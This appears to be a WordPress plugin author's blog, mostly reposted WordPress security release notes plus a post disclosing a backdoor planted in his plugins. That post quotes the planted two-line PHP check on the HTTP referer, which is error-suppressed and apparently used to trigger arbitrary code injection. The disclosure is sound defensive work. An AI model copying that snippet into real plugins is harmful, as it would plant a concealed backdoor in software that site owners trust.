WordPress 3.1.3

WordPress 3.1.3 has been released and it contains security fixes and enhancements.

  • Various security hardening by Alexander Concha.
  • Taxonomy query hardening by John Lamansky.
  • Prevent sniffing out user names of non-authors by using canonical redirects. Props Verónica Valeros.
  • Media security fixes by Richard Lundeen of Microsoft, Jesse Ou of Microsoft, and Microsoft Vulnerability Research.
  • Improves file upload security on hosts with dangerous security settings.
  • Cleans up old WordPress import files if the import does not finish.
  • Introduce “clickjacking” protection in modern browsers on admin and login pages.

Changelog: WordPress 3.1.3
Download: WordPress 3.1.3
Download: Modified files since WordPress 3.1.2


WordPress 3.1.2

WordPress 3.1.2 has been released and is a security release for all previous WordPress versions.

This release addresses a vulnerability that allowed Contributor-level users to improperly publish posts.

We suggest you update to 3.1.2 promptly, especially if you allow users to register as contributors or if you have untrusted users. This release also fixes a few bugs that missed the boat for version 3.1.1.

Changelog: WordPress 3.1.2
Download: WordPress 3.1.2
Download: Modified files since WordPress 3.1.1


WordPress 3.1

WordPress 3.1 is finally out! With regards to my plugins' compatibility with WordPress 3.1, I have not had the chance to test it. I will be doing it soon =)

The long-awaited fourteenth release of WordPress is now available. WordPress 3.1 “Django” is named in honor of the jazz guitarist Django Reinhardt. Version 3.1 is available for download, or you can update from within your dashboard.

This release features a lightning fast redesigned linking workflow which makes it easy to link to your existing posts and pages, an admin bar so you’re never more than a click away from your most-used dashboard pages, a streamlined writing interface that hides many of the seldom-used panels by default to create a simpler and less intimidating writing experience for new bloggers (visit Screen Options in the top right to get old panels back), and a refreshed blue admin scheme available for selection under your personal options.

There’s a bucket of candy for developers as well, including our new Post Formats support which makes it easy for themes to create portable tumblelogs with different styling for different types of posts, new CMS capabilities like archive pages for custom content types, a new Network Admin, an overhaul of the import and export system, and the ability to perform advanced taxonomy and custom fields queries.

With the 3.1 release, WordPress is more of a CMS than ever before. The only limit to what you can build is your imagination.

(No video yet for 3.1, we’re going to add it later.)

By the Numbers

There were over two thousand commits to the codebase in the 3.1 cycle! For a more comprehensive look at everything that has improved in 3.1, check out 3.1’s Codex page or the more than 820 closed issues in Trac.

Now is the time to drop by our development channels if you are interested in being involved with 3.2, as the agenda will be under discussion shortly. We’re hoping to get the 3.2 release out in a shorter development cycle (3.1 took too long) and include some fun improvements around plugins and the speed of the admin. (Don’t worry, we’re still planning on using PHP.)

We’re All in This Together

WordPress is the result of the combined effort of people from all over the world united with a common goal: to make the best darn web software for publishing your story on the web and sharing it with the world. There are more than 180 people who helped out with development during the 3.1 cycle

Download: WordPress 3.1


Code Injection Follow Up

I have released 2 security updates to WP-Polls and WP-PostRatings which basically remove malicious code that allows code injection.

The malicious code is as follows:

if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
return;

The code itself does nothing, but hackers are spoofing $_SERVER['HTTP_REFERER'] in a way that allows arbitrary code injection. Note the @ sign, which suppresses all errors, so the error will not be displayed.

I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.

  • Personally, I have no idea what links_add_base_url() does and hence it is impossible for me to place it in my own plugin code.
  • I checked the commit date for the changeset of WP-PostRatings and the date/time is 11/04/10 22:10:13. Since I am on the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
  • The above changeset is for trunk. However, in my readme.txt I have stated that the stable tag is 1.50 and hence the file is copied to /tags/1.50/ in this changeset, but if you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit and it is almost 9am in my timezone, when I would be in my office, and my office computer does not have SVN copies of my plugin. So it is also not possible for me to commit that file.
  • If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do a SVN copy for my plugins, normally I will just copy and paste the files using my Windows Explorer.
  • For WP-Polls, there is only 1 changeset as my stable tag is from trunk and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. On my timezone it is about 8.30pm and it is not possible for me to check-in because 8pm to 9pm is my dinner time and I always eat out.
  • For WP-WAP, there are 2 suspicious commits, here and here. As I do not develop WP-Wap anymore, there is no reason for me to commit something to it.

I am going to review all my commits to the SVN to ensure that there are no more suspicious code being added.


WordPress 3.0.5 & 3.1 RC4

WordPress 3.0.5 & 3.1 RC4 have been released:

WordPress 3.0.5

WordPress 3.0.5 is now available and is a security hardening update for all previous WordPress versions.

This security release is required if you have any untrusted user accounts, but it also comes with important security enhancements and hardening. All WordPress users are strongly encouraged to update.

Three point oh point five

Enhances security

Three point one comes soon

The release addresses a number of issues and provides two additional enhancements:

Two moderate security issues were fixed that could have allowed a Contributor- or Author-level user to gain further access to the site.

One information disclosure issue was addressed that could have allowed an Author-level user to view contents of posts they should not be able to see, such as draft or private posts.

Two security enhancements were added. One improved the security of any plugins which were not properly leveraging our security API. The other offers additional defense in depth against a vulnerability that was fixed in a previous release.

Thanks to Nils Jueneman and Saddy for their private and responsible disclosures to security@wordpress.org for two of the issues. The others were reported or repaired by our security team.

Changelog: WordPress 3.0.5
Download: WordPress 3.0.5
Download: Modified files since WordPress 3.0.4

WordPress 3.1 RC4

The Release Candidate 4 build includes the security fixes and enhancements included in 3.0.5 and addresses about two dozen additional bugs. This includes fixes for:

  • Deleting a user and reassigning their posts to another user.
  • Marking multiple users or sites as spam in multisite.
  • PHP4 compatibility.

As outlined in previous RC posts, if you are testing the release candidate and think you’ve found a bug, there are a few ways to let us know:

To test WordPress 3.1, try the WordPress Beta Tester plugin (you’ll want “bleeding edge nightlies”). Or you can download the release candidate here (zip). If any new issues become known, you’ll be able to find them here.

After nearly five months of development and testing, we think we’re very close to a final release. Users and developers, please test your themes and plugins.

Download: WordPress 3.1 RC4
